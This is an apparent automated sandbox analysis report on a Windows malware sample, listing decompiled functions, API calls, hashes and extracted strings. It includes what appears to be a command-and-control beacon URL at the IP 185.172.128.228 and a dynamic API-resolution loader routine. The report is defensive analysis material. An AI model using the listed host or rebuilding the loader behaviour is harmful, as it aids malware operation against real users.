___BuildCatchObject.LIBVCRUNTIME ref: 05CFCF2B

Part of subcall function 05CFCE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 05CFCEA7
Part of subcall function 05CFCE78: ___AdjustPointer.LIBCMT ref: 05CFCEC2

_UnwindNestedFrames.LIBCMT ref: 05CFCF40
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 05CFCF51
CallCatchBlock.LIBVCRUNTIME ref: 05CFCF79

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: 7419660f78c754798615d73ee3c44ed564ad3fc2a2c953cff1e10f3d8846088d
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 1F014C32204109BBCF526E95DC44EEB7F6AFF99754F044804FF18A6120D732E961EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCAA Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4

Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B

_UnwindNestedFrames.LIBCMT ref: 0040CCD9
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
CallCatchBlock.LIBVCRUNTIME ref: 0040CD12

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05D074BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,05CFED94,00000000,00000000,?,05D07461,05CFED94,00000000,00000000,00000000,?,05D07719,00000006,0042F348), ref: 05D074EC
GetLastError.KERNEL32(?,05D07461,05CFED94,00000000,00000000,00000000,?,05D07719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,05D07052), ref: 05D074F8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,05D07461,05CFED94,00000000,00000000,00000000,?,05D07719,00000006,0042F348,0042F340,0042F348,00000000), ref: 05D07506

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 64462f59fb088865b4ebc59340a5dca15a95b469090691d184899887481cdc81
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: E501F7367552279BC7318F68AC4CFA67B99FF057A1B501931FA0ADB1C0DB20E902C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004129CD

Strings

pow, xrefs: 004129A5, 004129C2

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E

Uniqueness

Uniqueness Score: -1.00%

Function 0041DDFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21

Strings

, xrefs: 0041DE66
.A, xrefs: 0041DE13

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: Info
String ID: $.A
API String ID: 1807457897-2696116503
Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 05CFA937 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 05CFA96A
__IsNonwritableInCurrentImage.LIBCMT ref: 05CFAA23

Strings

csm, xrefs: 05CFAA0D

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: c9880cb2eda6ed0d4e38f89b60cca4e70404f6a323523e0843a8d6e236b53bb5
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: C4410634B00209ABCF50DF29CC84AAEFBB1BF49314F148565EA1A5B391C7719A59CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05D0FFF9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 05D100D4

Strings

OCP, xrefs: 05D1004D
ACP, xrefs: 05D10017

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: f34b58d40f226107fe07072fccac136458ecf99ec0af545d4147d047536e4520
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: B0219262B04104B7E734AA74E909FA7726BFB84B50F468466ED4AD7144F736D9C083AC

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD92 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 0041FE6D

Strings

ACP, xrefs: 0041FDB0
OCP, xrefs: 0041FDE6

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C

Uniqueness

Uniqueness Score: -1.00%

Function 05D162B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05D162B6

Part of subcall function 05CF1E19: __EH_prolog.LIBCMT ref: 05CF1E1E

Part of subcall function 05CF266A: __EH_prolog.LIBCMT ref: 05CF266F

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05D16398

Strings

,jC, xrefs: 05D1638D

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID: ,jC
API String ID: 420165198-3201430929
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: e52603536a9bf8c432b3ab26f7797c9eeff6e79b10f95d71dd6eb2c912f79b6e
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 9131EBB5E01119EBDB14DF94D994AEDFBB4FF48304F10856AD405A3640DB74AA08DF64

Uniqueness

Uniqueness Score: -1.00%

Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00417217
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224

Strings

-@, xrefs: 004171EE, 00417202, 004171F3

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: -@
API String ID: 2279764990-2564449678
Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 05CF37D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05CF37DB

Strings

/ping.php?substr=%s, xrefs: 05CF37E3
185.172.128.228, xrefs: 05CF37E2

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 3ceb84532f9cd66de14f414fb6123d513370d44f600d85507b073077fac01a71
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: B501C072A05155BBDB04DF98EC44BAEBBB9FF44614F14092AF905D3240D7749A40C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040356F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403574

Strings

/ping.php?substr=%s, xrefs: 0040357C
185.172.128.228, xrefs: 0040357B

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402FEA
std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6

Strings

T*@, xrefs: 00402FFA

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: T*@
API String ID: 4198646248-2370032326
Opcode ID: f7290a10d1b4237e93a88f2e9094d642a1896cb01957c23fb39c05d414f97c01
Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
Opcode Fuzzy Hash: f7290a10d1b4237e93a88f2e9094d642a1896cb01957c23fb39c05d414f97c01
Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404373

Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47

__Getcoll.LIBCPMT ref: 004043CF

Strings

u@@, xrefs: 004043C9

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: H_prolog$Getcoll
String ID: u@@
API String ID: 206117190-736001340
Opcode ID: 98940f472b430986a063070397352c0148bb09207a456bdfd0cd06b8d288d3e7
Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
Opcode Fuzzy Hash: 98940f472b430986a063070397352c0148bb09207a456bdfd0cd06b8d288d3e7
Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 05D0A93B Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 05D0A9D1
GetLastError.KERNEL32 ref: 05D0A9DF
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 05D0AA3A

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction ID: 026c058eab705068bc241ee8c42c69aa1c6671899ec0477dc828133be557ef3d
Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction Fuzzy Hash: 0141B331704326AFCF21CF64DD48BBE7BA5EF41320F15916AE95AAB1E0D7708901C761

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6D4 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
GetLastError.KERNEL32 ref: 0041A778
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: be72b92f97b89cfc26330611fce1d14ea8f59d6c2fceb8f783a7245ea47926fa
Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
Opcode Fuzzy Hash: be72b92f97b89cfc26330611fce1d14ea8f59d6c2fceb8f783a7245ea47926fa
Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: u3bs.0.exePID: 6808, Parent PID: 4312COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	41

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,043141F8), ref: 0041625D
GetProcAddress.KERNEL32(74DD0000,04314218), ref: 00416275
GetProcAddress.KERNEL32(74DD0000,043303F0), ref: 0041628E
GetProcAddress.KERNEL32(74DD0000,04330438), ref: 004162A6
GetProcAddress.KERNEL32(74DD0000,04330450), ref: 004162BE
GetProcAddress.KERNEL32(74DD0000,04330420), ref: 004162D7
GetProcAddress.KERNEL32(74DD0000,0432F360), ref: 004162EF
GetProcAddress.KERNEL32(74DD0000,04330408), ref: 00416307
GetProcAddress.KERNEL32(74DD0000,04336270), ref: 00416320
GetProcAddress.KERNEL32(74DD0000,04336288), ref: 00416338
GetProcAddress.KERNEL32(74DD0000,04336258), ref: 00416350
GetProcAddress.KERNEL32(74DD0000,04314078), ref: 00416369
GetProcAddress.KERNEL32(74DD0000,04313F98), ref: 00416381
GetProcAddress.KERNEL32(74DD0000,04313F58), ref: 00416399
GetProcAddress.KERNEL32(74DD0000,04314238), ref: 004163B2
GetProcAddress.KERNEL32(74DD0000,04336210), ref: 004163CA
GetProcAddress.KERNEL32(74DD0000,043362A0), ref: 004163E2
GetProcAddress.KERNEL32(74DD0000,0432F3D8), ref: 004163FB
GetProcAddress.KERNEL32(74DD0000,04313EB8), ref: 00416413
GetProcAddress.KERNEL32(74DD0000,04336228), ref: 0041642B
GetProcAddress.KERNEL32(74DD0000,043361E0), ref: 00416444
GetProcAddress.KERNEL32(74DD0000,043361F8), ref: 0041645C
GetProcAddress.KERNEL32(74DD0000,04336240), ref: 00416474
GetProcAddress.KERNEL32(74DD0000,04314098), ref: 0041648D
GetProcAddress.KERNEL32(74DD0000,04335F70), ref: 004164A5
GetProcAddress.KERNEL32(74DD0000,043361B0), ref: 004164BD
GetProcAddress.KERNEL32(74DD0000,043360C0), ref: 004164D6
GetProcAddress.KERNEL32(74DD0000,04335FE8), ref: 004164EE
GetProcAddress.KERNEL32(74DD0000,04335EF8), ref: 00416506
GetProcAddress.KERNEL32(74DD0000,04336198), ref: 0041651F
GetProcAddress.KERNEL32(74DD0000,04336108), ref: 00416537
GetProcAddress.KERNEL32(74DD0000,04336138), ref: 0041654F
GetProcAddress.KERNEL32(74DD0000,04335F10), ref: 00416568
GetProcAddress.KERNEL32(74DD0000,04331FE0), ref: 00416580
GetProcAddress.KERNEL32(74DD0000,043360A8), ref: 00416598
GetProcAddress.KERNEL32(74DD0000,04336078), ref: 004165B1
GetProcAddress.KERNEL32(74DD0000,04314058), ref: 004165C9
GetProcAddress.KERNEL32(74DD0000,043360D8), ref: 004165E1
GetProcAddress.KERNEL32(74DD0000,04313FB8), ref: 004165FA
GetProcAddress.KERNEL32(74DD0000,04336180), ref: 00416612
GetProcAddress.KERNEL32(74DD0000,04335FD0), ref: 0041662A
GetProcAddress.KERNEL32(74DD0000,04313F78), ref: 00416643
GetProcAddress.KERNEL32(74DD0000,04313F38), ref: 0041665B
LoadLibraryA.KERNEL32(04336120,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(04336048,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(043360F0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(04336150,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(04335FA0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(04336168,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(04336090,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(04335F28,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(75290000,04314038), ref: 0041670A
GetProcAddress.KERNEL32(75290000,04336060), ref: 00416722
GetProcAddress.KERNEL32(75290000,04330560), ref: 0041673A
GetProcAddress.KERNEL32(75290000,043361C8), ref: 00416753
GetProcAddress.KERNEL32(75290000,04314178), ref: 0041676B
GetProcAddress.KERNEL32(734C0000,0432F608), ref: 00416790
GetProcAddress.KERNEL32(734C0000,04314158), ref: 004167A9
GetProcAddress.KERNEL32(734C0000,0432F680), ref: 004167C1
GetProcAddress.KERNEL32(734C0000,04335EE0), ref: 004167D9
GetProcAddress.KERNEL32(734C0000,04336030), ref: 004167F2
GetProcAddress.KERNEL32(734C0000,04314138), ref: 0041680A
GetProcAddress.KERNEL32(734C0000,04314258), ref: 00416822
GetProcAddress.KERNEL32(734C0000,04335F40), ref: 0041683B
GetProcAddress.KERNEL32(752C0000,04313ED8), ref: 0041685C
GetProcAddress.KERNEL32(752C0000,043141D8), ref: 00416874
GetProcAddress.KERNEL32(752C0000,04336000), ref: 0041688D
GetProcAddress.KERNEL32(752C0000,04335F58), ref: 004168A5
GetProcAddress.KERNEL32(752C0000,04314278), ref: 004168BD
GetProcAddress.KERNEL32(74EC0000,0432F388), ref: 004168E3
GetProcAddress.KERNEL32(74EC0000,0432F3B0), ref: 004168FB
GetProcAddress.KERNEL32(74EC0000,04335F88), ref: 00416913
GetProcAddress.KERNEL32(74EC0000,04313F18), ref: 0041692C
GetProcAddress.KERNEL32(74EC0000,04313EF8), ref: 00416944
GetProcAddress.KERNEL32(74EC0000,0432F518), ref: 0041695C
GetProcAddress.KERNEL32(75BD0000,04335FB8), ref: 00416982
GetProcAddress.KERNEL32(75BD0000,04314018), ref: 0041699A
GetProcAddress.KERNEL32(75BD0000,04330580), ref: 004169B2
GetProcAddress.KERNEL32(75BD0000,04336018), ref: 004169CB
GetProcAddress.KERNEL32(75BD0000,04336348), ref: 004169E3
GetProcAddress.KERNEL32(75BD0000,043140B8), ref: 004169FB
GetProcAddress.KERNEL32(75BD0000,04313FD8), ref: 00416A14
GetProcAddress.KERNEL32(75BD0000,04336390), ref: 00416A2C
GetProcAddress.KERNEL32(75BD0000,04336468), ref: 00416A44
GetProcAddress.KERNEL32(75A70000,04313FF8), ref: 00416A66
GetProcAddress.KERNEL32(75A70000,04336558), ref: 00416A7E
GetProcAddress.KERNEL32(75A70000,04336480), ref: 00416A96
GetProcAddress.KERNEL32(75A70000,043363D8), ref: 00416AAF
GetProcAddress.KERNEL32(75A70000,043363F0), ref: 00416AC7
GetProcAddress.KERNEL32(75450000,043140D8), ref: 00416AE8
GetProcAddress.KERNEL32(75450000,043140F8), ref: 00416B01
GetProcAddress.KERNEL32(75DA0000,04314118), ref: 00416B22
GetProcAddress.KERNEL32(75DA0000,043365D0), ref: 00416B3A
GetProcAddress.KERNEL32(6F090000,043141B8), ref: 00416B60
GetProcAddress.KERNEL32(6F090000,04314198), ref: 00416B78
GetProcAddress.KERNEL32(6F090000,043373B0), ref: 00416B90
GetProcAddress.KERNEL32(6F090000,04336588), ref: 00416BA9
GetProcAddress.KERNEL32(6F090000,04337630), ref: 00416BC1
GetProcAddress.KERNEL32(6F090000,04337530), ref: 00416BD9
GetProcAddress.KERNEL32(6F090000,043374F0), ref: 00416BF2
GetProcAddress.KERNEL32(6F090000,04337450), ref: 00416C0A
GetProcAddress.KERNEL32(75AF0000,043364B0), ref: 00416C2B
GetProcAddress.KERNEL32(75AF0000,043305C0), ref: 00416C44
GetProcAddress.KERNEL32(75AF0000,043364C8), ref: 00416C5C
GetProcAddress.KERNEL32(75AF0000,043364E0), ref: 00416C74
GetProcAddress.KERNEL32(75D90000,04337510), ref: 00416C96
GetProcAddress.KERNEL32(6CA80000,04336420), ref: 00416CB7
GetProcAddress.KERNEL32(6CA80000,043374B0), ref: 00416CCF
GetProcAddress.KERNEL32(6CA80000,04336360), ref: 00416CE8
GetProcAddress.KERNEL32(6CA80000,043362E8), ref: 00416D00

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
